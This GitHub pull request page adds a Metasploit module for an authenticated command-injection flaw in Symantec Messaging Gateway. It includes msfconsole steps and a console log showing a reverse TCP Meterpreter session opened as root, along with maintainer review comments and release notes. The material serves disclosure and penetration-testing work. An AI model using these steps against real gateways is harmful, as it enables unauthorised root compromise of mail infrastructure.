Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding module Symantec Messaging Gateway RCE #8540

Merged
merged 2 commits into from Jun 23, 2017

Conversation

@mmetince
Copy link
Contributor

commented Jun 10, 2017

This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a terminal command under the context of the root user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/symantec_messaging_gateway_exec
  • set RHOST <12.0.0.199>
  • set USERNAME admin. It's an username of management portal and it'sadmin by default.
  • set PASSWORD <Passw0rd>
  • set SSH_ADDRESS <12.0.0.15>. Replace IP with your own server where you are running your own SSH service with Kali etc.
  • set SSH_USERNAME <root>. Replace username of SSH service if needed.
  • set SSH_PASSWORD <toor>. Replace password of SSH user if needed.
  • set LHOST <12.0.0.1>
  • exploit
  • Verify the following output.
msf > use exploit/linux/http/symantec_messaging_gateway_exec 
msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199
RHOST => 12.0.0.199
msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin
USERNAME => admin
msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15
SSH_ADDRESS => 127.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root
SSH_USERNAME => root
msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor
SSH_PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:qwe123
[*] Capturing CSRF token
[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1
[*] Sending stage (39842 bytes) to 12.0.0.199
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : hacker.dev
OS              : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
  • Document is also included with this PR. You can see details about where and how to download this product.

All the technical details about this vulnerability can be found at following URL.
https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/

THINGS TO TODO

  • Grammar issues. ( Please leave a note if you spotted a grammar issues ).
  • Although they are not willing to do this, I need to get CVE number from Symantec. I've a big mailing loop with em. I believe we gonna get CVE assignment at next week. It's done.

Thanks all.

@dmohanty-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 15, 2017

Awesome, @mmetince, nice find! Any chance you might know where to download an archived 10.6.2 version for verification? (The symantec website seems to only provide the latest 10.6.3. https://symantec.flexnetoperations.com/control/symc/registeranonymouslicensetoken?inid=us_symc_messaging-gateway_pdp_to_leadgen_trialware_PID-20_messaging-gateway# shows the product version but a disabled archived versions tab)

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Jun 16, 2017

@dmohanty-r7 I downloaded 10.6.2 version from exactly same page 2 days ago. It seem they also released latest ISO as well.

I'm uploading 10.6.2 ISO to one of my server. Could you please send me your ssh public key ?

@mmetince

This comment has been minimized.

Copy link
Contributor Author

commented Jun 18, 2017

@dmohanty-r7 Finally, I've managed to upload it. I've delivered details to the msfdev@metasploit.com as an e-mail. Let me know if you have issue for accessing over ssh/scp.

@dmohanty-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 22, 2017

@mmetince It exploits successfully in my esxi environment... Great work!

@dmohanty-r7 dmohanty-r7 merged commit c147779 into rapid7:master Jun 23, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details
dmohanty-r7 added a commit that referenced this pull request Jun 23, 2017
@dmohanty-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 23, 2017

Release Notes

The exploits/linux/http/symantec_messaging_gateway_exec module has been added to the framework. This module exploits the command injection vulnerability of the Symantec Messaging Gateway product. An authenticated user can execute a terminal command under the context of the web server root user.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.